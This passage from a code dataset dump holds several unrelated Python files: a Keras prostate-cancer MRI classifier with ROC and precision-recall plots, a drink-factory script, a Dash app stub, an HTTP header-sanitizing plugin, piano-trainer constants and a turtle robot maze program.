os\r\nimport timeit\r\nimport tensorflow\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sn\r\nimport glob2 as glob\r\nimport nibabel as nib\r\nfrom functools import partial\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import interp\r\nfrom itertools import cycle\r\nfrom time import gmtime, strftime\r\n\r\nimport keras\r\nfrom keras import initializers\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.models import Sequential, Model\r\nfrom keras.layers import Input, Dense, Reshape, Activation, Dropout\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom keras.layers.advanced_activations import ELU, LeakyReLU\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.metrics import precision_recall_curve, auc\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.preprocessing import label_binarize\r\n\r\n\r\n\r\n# ----------------------------------------------------------------------------------\r\n# preparing data and folders\r\n# ----------------------------------------------------------------------------------\r\ndef data_path():\r\n\r\n if not os.path.exists(result_dir):\r\n print('result directory does not exist - creating...')\r\n os.makedirs(result_dir)\r\n print('log directory created...')\r\n else:\r\n print('result directory already exists ...')\r\n\r\n if not os.path.exists(log_dir):\r\n print('log directory does not exist - creating...')\r\n os.makedirs(log_dir)\r\n os.makedirs(log_dir + '/train')\r\n os.makedirs(log_dir + '/validation')\r\n print('log directory created.')\r\n else:\r\n print('log directory already exists...')\r\n\r\n# ----------------------------------------------------------------------------------\r\n# construct train, validation and test dataset\r\n# ----------------------------------------------------------------------------------\r\nclass PCa_data(object):\r\n \r\n '''\r\n calculate DNN statisical results\r\n '''\r\n \r\n def __init__(\r\n self,\r\n project_dir,\r\n random_state,\r\n test_split,\r\n train_file_1,\r\n train_file_2,\r\n test_file_1,\r\n test_file_2,\r\n ratio_1, \r\n ratio_2,\r\n ratio_3,\r\n ratio_4,\r\n x_input\r\n ):\r\n \r\n self.project_dir = project_dir\r\n self.random_state = random_state\r\n self.test_split = test_split\r\n self.train_file_1 = train_file_1\r\n self.train_file_2 = train_file_2\r\n self.test_file_1 = test_file_1\r\n self.test_file_2 = test_file_2\r\n self.ratio_1 = ratio_1\r\n self.ratio_2 = ratio_2 \r\n self.ratio_3 = ratio_3\r\n self.ratio_4 = ratio_4 \r\n self.x_input = x_input\r\n\r\n def map_list():\r\n\r\n maps_list = [\r\n 'b0_map.nii', #07\r\n 'dti_adc_map.nii', #08\r\n 'dti_axial_map.nii', #09\r\n 'dti_fa_map.nii', #10\r\n 'dti_radial_map.nii', #11\r\n 'fiber_ratio_map.nii', #12\r\n 'fiber1_axial_map.nii', #13\r\n 'fiber1_fa_map.nii', #14\r\n 'fiber1_fiber_ratio_map.nii', #15\r\n 'fiber1_radial_map.nii', #16\r\n 'fiber2_axial_map.nii', #17\r\n 'fiber2_fa_map.nii', #18\r\n 'fiber2_fiber_ratio_map.nii', #19\r\n 'fiber2_radial_map.nii', #20\r\n 'hindered_ratio_map.nii', #21\r\n 'hindered_adc_map.nii', #22\r\n 'iso_adc_map.nii', #23\r\n 'restricted_adc_1_map.nii', #24\r\n 'restricted_adc_2_map.nii', #25\r\n 'restricted_ratio_1_map.nii', #26\r\n 'restricted_ratio_2_map.nii', #27\r\n 'water_adc_map.nii', #28\r\n 'water_ratio_map.nii', #29\r\n ]\r\n \r\n return map_list\r\n\r\n def data_train_loading(self):\r\n \r\n df_1 = pd.read_csv(os.path.join(project_dir, self.train_file_1))\r\n df_2 = pd.read_csv(os.path.join(project_dir, self.train_file_2))\r\n df_train = pd.concat([df_1, df_2])\r\n\r\n return df_train\r\n\r\n def data_test_loading(self):\r\n \r\n df_5 = pd.read_csv(os.path.join(project_dir, self.test_file_1))\r\n df_6 = pd.read_csv(os.path.join(project_dir, self.test_file_2))\r\n df_test = pd.concat([df_5, df_6])\r\n \r\n return df_test\r\n\r\n def data_train(self):\r\n \r\n '''\r\n construct train dataset\r\n '''\r\n\r\n df_train = self.data_train_loading()\r\n\r\n df_train['y_cat'] = 2\r\n\r\n df_train.loc[df_train['ROI_Class'] == 't', 'y_cat'] = 1\r\n\r\n if histology == 'Benign':\r\n df_train.loc[df_train['ROI_Class'].isin(['p', 'c']), 'y_cat'] = 0\r\n \r\n else:\r\n df_train.loc[df_train['ROI_Class'] == histology, 'y_cat'] = 0\r\n \r\n class0 = df_train[df_train['y_cat'] == 0]\r\n class1 = df_train[df_train['y_cat'] == 1]\r\n\r\n class0_sample = class0.sample(int(class0.shape[0]*self.ratio_1))\r\n class1_sample = class1.sample(int(class1.shape[0]*self.ratio_2))\r\n\r\n df_train_sum = pd.concat([class0_sample, class1_sample])\r\n\r\n x_train = df_train_sum.iloc[:, self.x_input]\r\n y_train = df_train_sum.y_cat.astype('int')\r\n\r\n return x_train, y_train\r\n\r\n def data_val_test(self):\r\n \r\n '''\r\n construct test dataset\r\n '''\r\n\r\n df_test = self.data_test_loading()\r\n\r\n df_test['y_cat'] = 2\r\n\r\n df_test.loc[df_test['ROI_Class'] == 't', 'y_cat'] = 1\r\n\r\n if histology == 'Benign':\r\n df_test.loc[df_test['ROI_Class'].isin(['p', 'c']), 'y_cat'] = 0\r\n \r\n else:\r\n df_test.loc[df_test['ROI_Class'] == histology, 'y_cat'] = 0\r\n \r\n class0 = df_test[df_test['y_cat'] == 0]\r\n class1 = df_test[df_test['y_cat'] == 1]\r\n\r\n class0_sample = class0.sample(int(class0.shape[0]*self.ratio_3))\r\n class1_sample = class1.sample(int(class1.shape[0]*self.ratio_4))\r\n\r\n df_test_sum = pd.concat([class0_sample, class1_sample])\r\n\r\n x_val_test = df_test_sum.iloc[:, self.x_input]\r\n y_val_test = df_test_sum.y_cat.astype('int')\r\n\r\n x_val, x_test, y_val, y_test = train_test_split(\r\n x_val_test,\r\n y_val_test,\r\n test_size=self.test_split,\r\n random_state=self.random_state\r\n )\r\n return x_val, x_test, y_val, y_test\r\n \r\n# ----------------------------------------------------------------------------------\r\n# construct DNN model with batch normalization layers and dropout layers\r\n# ----------------------------------------------------------------------------------\r\nclass Keras_model(object):\r\n \r\n def __init__(\r\n self,\r\n init,\r\n optimizer,\r\n loss,\r\n activation,\r\n dropout_rate,\r\n batch_momentum, \r\n n_inputs,\r\n n_outputs\r\n ):\r\n \r\n self.init = init\r\n self.optimizer = optimizer\r\n self.loss = loss\r\n self.dropout_rate = dropout_rate\r\n self.batch_momentum = batch_momentum\r\n self.n_inputs = n_inputs\r\n self.n_outputs = n_outputs\r\n self.activation = activation\r\n \r\n def build_model(self):\r\n \r\n model = Sequential()\r\n\r\n dense_layer = partial(\r\n Dense,\r\n init=self.init, \r\n use_bias=False,\r\n activation=None,\r\n )\r\n\r\n batch_normalization = partial(\r\n BatchNormalization,\r\n axis=-1,\r\n momentum=self.batch_momentum,\r\n epsilon=0.001,\r\n beta_initializer='zeros',\r\n gamma_initializer='ones',\r\n beta_regularizer=None,\r\n gamma_regularizer=None \r\n )\r\n \r\n # input layer \r\n model.add(dense_layer(self.n_inputs, input_dim=self.n_inputs))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 1\r\n model.add(dense_layer(n_hidden1))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 2\r\n model.add(dense_layer(n_hidden2))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 3\r\n model.add(dense_layer(n_hidden3))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 4\r\n model.add(dense_layer(n_hidden4))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 5\r\n model.add(dense_layer(n_hidden5))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 6\r\n model.add(dense_layer(n_hidden6))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 7\r\n model.add(dense_layer(n_hidden7))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 8\r\n model.add(dense_layer(n_hidden8))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # hidden layer 9\r\n model.add(dense_layer(n_hidden9))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n \r\n # hidden layer 10\r\n model.add(dense_layer(n_hidden10))\r\n model.add(batch_normalization())\r\n model.add(self.activation)\r\n model.add(Dropout(self.dropout_rate))\r\n\r\n # output layer\r\n model.add(dense_layer(self.n_outputs))\r\n model.add(batch_normalization())\r\n model.add(Activation(output_activation))\r\n\r\n #model.summary()\r\n\r\n model.compile(\r\n loss=self.loss,\r\n optimizer=self.optimizer,\r\n metrics=['accuracy']\r\n )\r\n \r\n return model\r\n\r\n# ----------------------------------------------------------------------------------\r\n# trainning DNN model\r\n# ----------------------------------------------------------------------------------\r\ndef model_training():\r\n\r\n history = model.fit(\r\n x=x_train,\r\n y=y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=0,\r\n callbacks=None,\r\n validation_split=None,\r\n validation_data=(x_val, y_val),\r\n shuffle=True,\r\n class_weight=None,\r\n sample_weight=None,\r\n initial_epoch=0,\r\n steps_per_epoch=None,\r\n validation_steps=None, \r\n )\r\n\r\n score = model.evaluate(\r\n x_test,\r\n y_test,\r\n verbose=0\r\n )\r\n \r\n y_pred = model.predict(x_test)\r\n y_prob = model.predict_proba(x_test)[:,1]\r\n\r\n test_loss = score[0]\r\n test_accuracy = score[1]\r\n\r\n test_loss = np.around(test_loss, 3)\r\n test_accuracy = np.around(test_accuracy, 3)\r\n\r\n return y_pred, y_prob, test_loss, test_accuracy\r\n\r\n# ----------------------------------------------------------------------------------\r\n# ROC and AUC\r\n# ----------------------------------------------------------------------------------\r\ndef DNN_ROC():\r\n \r\n fpr = dict()\r\n tpr = dict()\r\n roc_auc = dict()\r\n threshold = dict()\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1, 1, 1)\r\n ax.set_aspect('equal')\r\n \r\n colors = cycle(['aqua', 'red', 'purple', 'royalblue'])\r\n\r\n for i, color in zip(range(len(y_prob_list)), colors):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_test_list[i], y_prob_list[i])\r\n \r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n \r\n print('ROC AUC %.2f' % roc_auc[i])\r\n \r\n plt.plot(\r\n fpr[i],\r\n tpr[i],\r\n color=color,\r\n linewidth=3,\r\n label='AUC %0.2f' % roc_auc[i]\r\n )\r\n\r\n plt.xlim([-0.03, 1])\r\n plt.ylim([0, 1.03])\r\n ax.axhline(y=0, color='k', linewidth=4)\r\n ax.axhline(y=1.03, color='k', linewidth=4)\r\n ax.axvline(x=-0.03, color='k', linewidth=4)\r\n ax.axvline(x=1, color='k', linewidth=4) \r\n plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=14, fontweight='bold')\r\n plt.yticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=14, fontweight='bold')\r\n #plt.xlabel('False Positive Rate', fontweight='bold', fontsize=15)\r\n #plt.ylabel('True Positive Rate', fontweight='bold', fontsize=15)\r\n plt.legend(loc='lower right', prop={'size': 14, 'weight': 'bold'}) \r\n plt.grid(True)\r\n\r\n ROC_filename = 'ROC' + '_' + \\\r\n str(count) + \\\r\n str(learning_rate) + '_' + \\\r\n str(batch_momentum) + '_' + \\\r\n str(epochs) + '_' + \\\r\n str(dropout_rate) + \\\r\n str(batch_size) + \\\r\n strftime(\"%d-%b-%Y-%H-%M-%S\", gmtime()) + '.png'\r\n \r\n plt.savefig(os.path.join(result_dir, ROC_filename), format='png', dpi=600)\r\n #plt.show()\r\n plt.close()\r\n\r\n# ----------------------------------------------------------------------------------\r\n# precision recall curve\r\n# ----------------------------------------------------------------------------------\r\ndef DNN_PRC():\r\n \r\n precision = dict()\r\n recall = dict()\r\n threshold = dict()\r\n prc_auc = []\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(1, 1, 1)\r\n ax.set_aspect('equal')\r\n \r\n colors = cycle(['aqua', 'red', 'purple', 'royalblue'])\r\n\r\n for i, color in zip(range(len(y_prob_list)), colors):\r\n\r\n precision[i], recall[i], _ = precision_recall_curve(y_test_list[i],\r\n y_prob_list[i])\r\n \r\n RP_2D = np.array([recall[i], precision[i]])\r\n RP_2D = RP_2D[np.argsort(RP_2D[:,0])]\r\n\r\n prc_auc.append(auc(RP_2D[1], RP_2D[0]))\r\n \r\n print('PRC AUC %.2f' % auc(RP_2D[1], RP_2D[0]))\r\n \r\n plt.plot(\r\n recall[i],\r\n precision[i],\r\n color=color,\r\n linewidth=3,\r\n label='AUC %0.2f' % prc_auc[i]\r\n )\r\n\r\n plt.xlim([0, 1.03])\r\n plt.ylim([0, 1.03])\r\n ax.axhline(y=0, color='k', linewidth=4)\r\n ax.axhline(y=1.03, color='k', linewidth=4)\r\n ax.axvline(x=0, color='k', linewidth=4)\r\n ax.axvline(x=1.03, color='k', linewidth=4) \r\n plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=16, fontweight='bold')\r\n plt.yticks([0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=16, fontweight='bold')\r\n #plt.xlabel('recall', fontweight='bold', fontsize=16)\r\n #plt.ylabel('precision', fontweight='bold', fontsize=16)\r\n plt.legend(loc='lower left', prop={'size': 14, 'weight': 'bold'}) \r\n plt.grid(True)\r\n\r\n PRC_filename = 'PRC' + '_' + \\\r\n str(count) + \\\r\n str(learning_rate) + '_' + \\\r\n str(batch_momentum) + '_' + \\\r\n str(epochs) + '_' + \\\r\n str(dropout_rate) + \\\r\n str(batch_size) + \\\r\n strftime(\"%d-%b-%Y-%H-%M-%S\", gmtime()) + '.png'\r\n \r\n plt.savefig(\r\n os.path.join(result_dir, PRC_filename),\r\n format='png',\r\n dpi=600\r\n )\r\n \r\n #plt.show()\r\n plt.close()\r\n \r\n# ----------------------------------------------------------------------------------\r\n# model hyper parameters\r\n# ---------------------------------------------------------------------------------- \r\nif __name__ == '__main__':\r\n\r\n # model paramters\r\n alpha = 0.3\r\n random_state = 42\r\n ELU_alpha = 1.0\r\n digit = 3\r\n test_split = 0.5\r\n count = 0\r\n x_input = range(7, 30)\r\n n_inputs = len(x_input)\r\n n_outputs = 2\r\n n_classes = n_outputs\r\n ratio_1 = 1.0\r\n ratio_2 = 1.0\r\n ratio_3 = 1.0\r\n ratio_4 = 1.0\r\n\r\n Learning_rate = [0.01, 0.1]\r\n Momentum = [0.9]\r\n Dropout_rate = [0.3]\r\n Batch_size = [500]\r\n Epochs = [5]\r\n N_neurons = [100]\r\n histology_list = ['p', 'c', 'Benign']\r\n \r\n n_neurons = 100\r\n n_hidden1 = n_neurons\r\n n_hidden2 = n_neurons\r\n n_hidden3 = n_neurons\r\n n_hidden4 = n_neurons\r\n n_hidden5 = n_neurons\r\n n_hidden6 = n_neurons\r\n n_hidden7 = n_neurons\r\n n_hidden8 = n_neurons\r\n n_hidden9 = n_neurons\r\n n_hidden10 = n_neurons\r\n\r\n # model functions\r\n init = 'he_uniform' \r\n optimizer = 'adam' \r\n loss = 'sparse_categorical_crossentropy'\r\n output_activation = 'softmax'\r\n activation = ELU(alpha=ELU_alpha) \r\n \r\n '''\r\n keranl initializer: 'he_uniform', 'lecun_normal', 'lecun_uniform'\r\n optimizer function: 'adam', 'adamax', 'nadam', 'sgd'\r\n loss function: 'categorical_crossentropy'\r\n activation function: LeakyReLU(alpha=alpha)\r\n '''\r\n\r\n # data and results path \r\n project_dir = r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\data'\r\n result_dir = r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\result'\r\n log_dir = r'\\\\10.39.42.102\\temp\\Prostate_Cancer_Project_Shanghai\\PCa_Machine_Learning\\PCa_Benign_Classification\\log'\r\n \r\n train_file_1 = 'benign_mpMRI.csv'\r\n train_file_2 = 'PCa_train.csv'\r\n test_file_1 = 'benign_biopsy.csv'\r\n test_file_2 = 'PCa_test.csv'\r\n\r\n # ----------------------------------------------------------------------------------\r\n # run the model\r\n # ----------------------------------------------------------------------------------\r\n \r\n print(\"Deep Neural Network for PCa grade classification: start...\")\r\n\r\n start = timeit.default_timer()\r\n\r\n data_path()\r\n\r\n total_run = len(Momentum)*len(Epochs)*len(Batch_size)*len(Learning_rate)*len(N_neurons)\r\n\r\n breaking = False\r\n\r\n for i in Batch_size:\r\n \r\n for j in Momentum:\r\n \r\n for k in Epochs:\r\n\r\n for l in Learning_rate:\r\n\r\n for m in N_neurons:\r\n\r\n for n in Dropout_rate:\r\n\r\n count += 1\r\n\r\n print('\\nRunning times: ' + str(count) + '/' + str(total_run))\r\n\r\n x_test_list = []\r\n y_test_list = []\r\n y_prob_list = []\r\n y_pred_list = []\r\n loss_list = []\r\n accuracy_list = []\r\n\r\n batch_size = i\r\n batch_momentum = j\r\n epochs = k\r\n learning_rate = l\r\n n_neurons = m\r\n dropout_rate = n\r\n\r\n PCa_Data = PCa_data(\r\n project_dir,\r\n random_state,\r\n test_split,\r\n train_file_1,\r\n train_file_2,\r\n test_file_1,\r\n test_file_2,\r\n ratio_1, \r\n ratio_2,\r\n ratio_3,\r\n ratio_4,\r\n x_input\r\n )\r\n\r\n model = Keras_model(\r\n init,\r\n optimizer,\r\n loss,\r\n activation,\r\n dropout_rate,\r\n batch_momentum,\r\n n_inputs,\r\n n_outputs\r\n ).build_model()\r\n\r\n for histology in histology_list:\r\n\r\n x_train, y_train = PCa_Data.data_train()\r\n \r\n x_val, x_test, y_val, y_test = PCa_Data.data_val_test()\r\n \r\n x_test_list.append(x_test)\r\n y_test_list.append(y_test)\r\n\r\n for x_test, y_test in zip(x_test_list, y_test_list):\r\n\r\n y_pred, y_prob, test_loss, test_accuracy = model_training()\r\n \r\n y_prob_list.append(y_prob)\r\n y_pred_list.append(y_pred)\r\n loss_list.append(test_loss)\r\n accuracy_list.append(test_accuracy)\r\n\r\n DNN_ROC()\r\n DNN_PRC()\r\n\r\n print('\\noverall loss: ', loss_list)\r\n print('overall accuracy:', accuracy_list)\r\n print('epochs: ', epochs)\r\n print('batch size: ', batch_size)\r\n print('dropout rate: ', dropout_rate)\r\n print('batch momentum: ', batch_momentum)\r\n print('learning rate: ', learning_rate)\r\n print('neuron numbers: ', n_neurons)\r\n \r\n if test_accuracy > 0.999:\r\n breaking = True\r\n\r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n \r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n\r\n if breaking == True:\r\n break\r\n\r\n print('train size: ', len(x_train))\r\n print('validation size:', len(x_val))\r\n print('test size: ', len(x_test))\r\n \r\n stop = timeit.default_timer()\r\n running_seconds = np.around(stop - start, 0)\r\n running_minutes = np.around(running_seconds/60, 0)\r\n print('DNN running time:', running_seconds, 'seconds')\r\n print('DNN running time:', running_minutes, 'minutes')\r\n\r\n","sub_path":"2020_PCa_Project/Keras_PCa_invivo_ROC_PRC.py","file_name":"Keras_PCa_invivo_ROC_PRC.py","file_ext":"py","file_size_in_byte":26281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64501619","text":"from factory import CappuccinoFactory, BlackCoffeeFactory, LemonadeFactory, HotMilkFactory, CocaColaFactory\r\nfrom customization import Customization\r\nfrom preparation import Preparation\r\n\r\nwhile True:\r\n factory_cappuccino = CappuccinoFactory()\r\n factory_black_coffee = BlackCoffeeFactory()\r\n factory_lemon = LemonadeFactory()\r\n factory_milk = HotMilkFactory()\r\n factory_coca_cola = CocaColaFactory()\r\n\r\n cust = Customization(float(input(\"Extra milk - \")), float(input(\"Sugar - \")), float(input(\"Mug size - \")))\r\n cust = (cust.extra_milk, cust.sugar, cust.mug_size)\r\n\r\n prep = Preparation(float(input(\"Milk - \")), float(input(\"Water - \")), float(input(\"Sugar - \")),\r\n float(input(\"Coke - \")), float(input(\"Coffee - \")), float(input(\"Flavour - \")),\r\n float(input(\"Tea - \")))\r\n prep = (prep.milk, prep.water, prep.sugar, prep.coke, prep.liquid_coffee, prep.added_flavour, prep.tea)\r\n\r\n cappuccino = factory_cappuccino.get_product()\r\n black_coffee = factory_black_coffee.get_product()\r\n lemon = factory_lemon.get_product()\r\n milk = factory_milk.get_product()\r\n coca_cola = factory_coca_cola.get_product()\r\n\r\n cappuccino.make(cappuccino, cust, prep)\r\n cappuccino.set_milk()\r\n cappuccino.set_sugar()\r\n cappuccino.set_coffee()\r\n print(\"\\n\")\r\n black_coffee.make(black_coffee, cust, prep)\r\n black_coffee.set_water()\r\n black_coffee.set_coffee()\r\n print(\"\\n\")\r\n lemon.make(lemon, cust, prep)\r\n lemon.set_water()\r\n lemon.set_sugar()\r\n lemon.set_lemon_juice()\r\n print(\"\\n\")\r\n milk.make(milk, cust, prep)\r\n milk.set_milk(cust[0])\r\n print(\"\\n\")\r\n coca_cola.make(coca_cola, cust, prep)\r\n coca_cola.set_water()\r\n coca_cola.set_coke()","sub_path":"lab 3(Kramar)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"272705368","text":"import os\nimport dash\n\nfrom layout import create_layout\n\napp = dash.Dash(\n __name__,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}],\n external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'],\n)\n\nserver = app.server # the Flask app\napp.layout = create_layout(app) # Dash layout\n\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329983566","text":"from transformer.helpers import zip_kv_pairs\nfrom transformer.plugins import plugin, Contract\nfrom transformer.task import Task2\n\n\n@plugin(Contract.OnTask)\ndef plugin(task: Task2) -> Task2:\n \"\"\"\n Removes Chrome-specific, RFC-non-compliant headers starting with `:`.\n Converts header names to lowercase to simplify further overriding.\n Removes the cookie header as it is handled by Locust's HttpSession.\n \"\"\"\n headers = task.request.headers\n\n if not isinstance(headers, dict):\n headers = zip_kv_pairs(headers)\n\n sanitized_headers = {\n k.lower(): v\n for (k, v) in headers.items()\n if not k.startswith(\":\") and k.lower() != \"cookie\"\n }\n\n task.request = task.request._replace(headers=sanitized_headers)\n\n return task\n","sub_path":"transformer/plugins/sanitize_headers.py","file_name":"sanitize_headers.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"276680011","text":"WINDOW_WIDTH = 560\nMODE_SELECTOR_HEIGHT = 50\nCONTROLS_FRAME_HEIGHT = 100\nKEYBOARD_HEIGHT = 160\nSCORE_DISPLAY_HEIGHT = 110\nWINDOW_HEIGHT = KEYBOARD_HEIGHT + CONTROLS_FRAME_HEIGHT + \\\n MODE_SELECTOR_HEIGHT + SCORE_DISPLAY_HEIGHT\n\nCHOICES = ['Scales','Chords','Chord Progressions']\n\nWHITE_KEY_IMAGE = '../pictures/white_key.gif'\nWHITE_KEY_PRESSED_IMAGE = '../pictures/white_key_pressed.gif'\nBLACK_KEY_IMAGE = '../pictures/black_key.gif'\nBLACK_KEY_PRESSED_IMAGE = '../pictures/black_key_pressed.gif'\n\nALL_KEYS = ['C1','C#1','D1','D#1','E1','F1','F#1','G1','G#1','A1', \\\n 'A#1','B1', 'C2','C#2','D2','D#2','E2','F2','F#2','G2',\\\n 'G#2','A2','A#2','B2']\nKEYS = ['C','C#','D','D#','E','F','F#','G','G#','A','A#','B']\n\nWHITE_KEY_NAMES = ['C1','D1', 'E1', 'F1', 'G1','A1', 'B1', \\\n 'C2','D2', 'E2', 'F2', 'G2','A2', 'B2']\n\nBLACK_KEY_NAMES = ['C#1', 'D#1', 'F#1', 'G#1', 'A#1', 'C#2', 'D#2', \\\n 'F#2', 'G#2', 'A#2']\n\nWHITE_KEY_X_COORDINATES = [0,40, 80,120, 160, 200, 240,280, 320, 360, \\\n 400, 440, 480,520]\nBLACK_KEY_X_COORDINATES = [30,70,150,190, 230, 310, 350, 430,470, 510]\n\nSCALES_JSON_FILE = '../json/scales.json'\nCHORDS_JSON_FILE = '../json/chords.json'\nPROGRESSIONS_JSON_FILE = '../json/progressions.json'\n\nROMAN_TO_NUMBER = { 'I':0, 'II': 2, 'III':4, 'IV':5, 'V': 7, 'VI':9, 'VII': 11,\n'i':0, 'ii': 2, 'iii':4, 'iv':5, 'v': 7, 'vi':9, 'vii': 11\n}\t\n","sub_path":"Chapter 07/7.07/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551521001","text":"import turtle\nimport maze\nrobo = turtle.Turtle('turtle')\nheadings = [90, 0, 270, 180]\nsize = 210\nscreen = turtle.Screen()\nscreen.setworldcoordinates(-size, -size, size, size)\nscreen.tracer(0)\n\ndef draw_screen():\n a = turtle.Turtle()\n a.hideturtle()\n screen.tracer(0)\n a.pu()\n a.goto(-100, -200)\n a.pd()\n a.goto(100, -200)\n a.goto(100, 200)\n a.goto(-100, 200)\n a.goto(-100, -200)\n screen.tracer(1)\n\n\ndef draw_square(x, y):\n a = turtle.Turtle()\n a.hideturtle()\n screen.tracer(0)\n a.pu()\n a.goto(x, y)\n a.pd()\n a.seth(0)\n a.begin_fill()\n for _ in range(4):\n a.fd(4)\n a.lt(90)\n a.end_fill()\n screen.tracer(1)\n\ndef validate_pos(r, dist: int, user_input: str):\n \"\"\"Validates the position of the robot \"\"\"\n args = user_input.lower().split(' ', 1)\n new = r.pos[r.direction%2] + int(args[1])*(-1 if r.direction > 1 else 1)*(-1 if 'back' in args else 1)\n if r.direction%2 == 0:\n if (-200 <= new <= 200) == False:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n else:\n if (-100 <= new <= 100) == False:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n if r.direction%2 == 0:\n pos = maze.is_position_blocked(r.pos[1], new)\n path = maze.is_path_blocked(r.pos[1], r.pos[0], r.pos[1], new)\n else:\n pos = maze.is_position_blocked(new, r.pos[0])\n path = maze.is_path_blocked(r.pos[1], r.pos[0], new, r.pos[0])\n if pos or path:\n print(f\"{r.name}: Sorry, I cannot go outside my safe zone.\")\n return False\n return True\n\ndef sprint(r, user_input: str):\n args = user_input.lower().split(' ', 1)\n if len(args) == 1:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n if args[1].isdigit() == False:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n n = int(args[1])\n if validate_pos(r, (n*(n+1)//2), user_input):\n for i in range(-n, 0):\n cmd = f'forward {-i}'\n out = move(r, cmd)[0]\n print(out)\n robo.pu()\n robo.seth(headings[r.direction])\n robo.goto(r.pos[1], r.pos[0])\n return '', True\n\n\ndef move(r, user_input):\n \"\"\"moves the robot backward or forward depending on user input\n ie. 'forward 20' will move the robot forward by 20 and\n 'back 20' will move the robot back 20\"\"\"\n args = user_input.lower().split(' ', 1)\n d = ('back' if 'back' in args else 'forward')\n if len(args) == 1:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'\", True\n if args[1].isdigit() == False:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'\", True\n if validate_pos(r, int(args[1]), user_input):\n n = int(args[1])*(-1 if r.direction > 1 else 1)*(-1 if 'back' in args else 1)\n r.pos[r.direction%2] += n\n robo.pu()\n robo.seth(headings[r.direction])\n screen.tracer(1)\n robo.speed(0)\n robo.goto(r.pos[1], r.pos[0])\n return f' > {r.name} moved {d} by {args[1]} steps.', True\n else:\n return '', True\n\ndef off(r, user_input):\n \"\"\"Turns off the robot...\"\"\"\n return f'{r.name}: Shutting down..', False\n\ndef turn(r, user_input):\n args = user_input.lower().split(' ', 1)\n n = (-1 if 'left'in args else 1)\n r.direction = (r.direction + n)%4\n d = ('left' if 'left' in args else 'right')\n robo.seth(headings[r.direction])\n return f' > {r.name} turned {d}.', True\n\ndef help_f(r, user_input):\n help_string=\"\"\"I can understand these commands:\nOFF - Shut down robot\nHELP - provide information about commands\nFORWARD - move forward by specified number of steps, e.g. 'FORWARD 10'\nBACK - move backward by specified number of steps, e.g. 'BACK 10'\nRIGHT - turn right by 90 degrees\nLEFT - turn left by 90 degrees\nSPRINT - sprint forward according to a formula\nREPLAY - replays all movement commands from history [FORWARD, BACK, RIGHT, LEFT, SPRINT]\n\"\"\"\n return help_string, True\n\ndef show_position(r):\n return (f' > {r.name} now at position ({r.pos[1]},{r.pos[0]}).')\n\ndef replay(r, user_input):\n commands = {'off':off, 'help':help, 'forward': move, 'left':turn, 'right':turn, 'back':move,'sprint':sprint , 